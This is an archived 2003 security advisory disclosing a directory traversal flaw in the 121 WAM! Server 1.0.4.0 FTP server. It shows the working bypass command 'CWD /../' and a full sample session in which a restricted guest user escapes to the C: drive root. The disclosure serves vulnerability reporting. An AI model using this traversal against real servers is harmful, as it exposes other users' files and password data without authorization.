wam1040.txt

2003-08-10T00:00:00
ID PACKETSTORM:31516
Type packetstorm
Reporter Peter Winter-Smith
Modified 2003-08-10T00:00:00

Description

                                        
                                            `Directory Traversal Vulnerability in 121 WAM! Server 1.0.4.0  
  
Url: http://www.121software.com/121wam/server.asp  
  
"Imagine if you could centralise the management of your FTP server farm and  
give customers additional database management capability."  
  
"121 WAM! Server is a standard FTP server for Microsoft Windows. When used   
in  
conjunction with 121 WAM! Client, it also provides your users with a  
complete solution to manage their online databases including Microsoft   
Access,  
SQL Server and MySQL. 121 WAM! makes uploading, downloading and transferring  
data a simple drag and drop operation. 121 WAM! Server is the first FTP   
server  
that supports database transfer functionality."  
- From the Vendor's Website  
  
It is possible to leave the root directory assigned to a resitricted   
username  
and download any file on the remote computer.  
This can include, but is not limited to, the files of other users, and  
password files on the main server.  
  
Sending the command:  
  
CWD ..  
  
Will not change the directory, however:  
  
CWD /../  
  
Will allow a restricted user to 'hop' out of the pre-definied user root  
directory, and browse the hard drive.  
  
Sample Session:  
===============  
[ First I log in under 'guest', confined to directory 'c:\root' ]  
  
Microsoft Windows XP [Version 5.1.2600]  
(C) Copyright 1985-2001 Microsoft Corp.  
  
C:\WINDOWS\system32>ftp 82.35.22.2  
Connected to 82.35.22.2.  
220- ***** ***** ***** *****  
220- 121 WAM! Server Version 1. 0. 4. 0  
220- Get 121 WAM! Client for extra functionalities  
220- such as database operations  
220- Check out http://www.121software.com  
220- ***** ***** ***** *****  
220 Welcome to 121 WAM! Server  
User (82.35.22.2:(none)): guest  
331 User name okay, need password.  
Password:  
230 User logged in, proceed.  
ftp> dir  
200 Port command ok.  
150 Ready to transfer data.  
drwx------ 2 owner nogroup 0 May 21 13:46 repd  
-rwx------ 1 owner nogroup 10462 May 17 21:13 help.htm  
-rwx------ 1 owner nogroup 75264 May 18 14:39 ralf4.exe  
-rwx------ 1 owner nogroup 805 May 17 16:20 README.txt  
-rwx------ 1 owner nogroup 439 May 17 15:32 SETUP.bat  
drwx------ 2 owner nogroup 0 Jun 05 23:32 conf  
drwx------ 2 owner nogroup 0 Jun 06 00:11 docs  
drwx------ 2 owner nogroup 0 Jun 18 23:20 images  
226 File transfer complete.  
ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.  
ftp> cd ..  
250 CWD command completed successfully.  
ftp> dir  
200 Port command ok.  
150 Ready to transfer data.  
drwx------ 2 owner nogroup 0 May 21 13:46 repd  
-rwx------ 1 owner nogroup 10462 May 17 21:13 help.htm  
-rwx------ 1 owner nogroup 75264 May 18 14:39 ralf4.exe  
-rwx------ 1 owner nogroup 805 May 17 16:20 README.txt  
-rwx------ 1 owner nogroup 439 May 17 15:32 SETUP.bat  
drwx------ 2 owner nogroup 0 Jun 05 23:32 conf  
drwx------ 2 owner nogroup 0 Jun 06 00:11 docs  
drwx------ 2 owner nogroup 0 Jun 18 23:20 images  
226 File transfer complete.  
ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.  
  
[ As you can see, a regular 'cd ..' won't allow me to leave my root dir. ]  
  
ftp> cd /../  
250 CWD command completed successfully.  
ftp> dir  
200 Port command ok.  
150 Ready to transfer data.  
drwx------ 2 owner nogroup 0 May 10 16:18 WARM  
drwx------ 2 owner nogroup 0 Jul 15 2002 WINDOWS  
drwx------ 2 owner nogroup 0 Jul 15 2002 Documents and   
Settings  
[snip ...]  
drwx------ 2 owner nogroup 0 Jul 15 2002 Program Files  
-rwx------ 1 owner nogroup 0 Jul 15 2002 CONFIG.SYS  
-r-x------ 1 owner nogroup 5517 Jul 15 2002 CLDMA.LOG  
-rwx------ 1 owner nogroup 0 Jul 31 2002 CONFIG.WIN  
drwx------ 2 owner nogroup 0 Sep 28 2002 perlsetup  
[snip ...]  
drwx------ 2 owner nogroup 0 Jul 24 20:48 cygwin  
-rwx------ 1 owner nogroup 475136 Aug 29 2002 ASMEDIT  
-rwx------ 1 owner nogroup 17091 Sep 02 2002 gddreleasetemp  
226 File transfer complete.  
ftp: 17589 bytes received in 0.22Seconds 80.32Kbytes/sec.  
ftp>  
  
[ However, the 'cd /../' command got me straight to 'c:\'! ]  
  
  
======================================================================  
  
  
Operating system and servicepack level:  
Windows 9x/Me/NT Based  
  
  
Software:  
121 WAM! Server 1.0.4.0 (Possibly previous versions)  
  
  
Under what circumstances the vulnerability was discovered:  
Under a vulnerability search.  
  
  
If the vendor has been notified:  
Yes, I think we can expect a patch some day soon :o)  
  
  
How to contact you for further information:  
I can always be reached at peter4020@hotmail.com  
  
  
Please credit this find to:  
Peter Winter-Smith  
  
  
Thank you for your time,  
-Peter  
  
_________________________________________________________________  
Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile  
  
`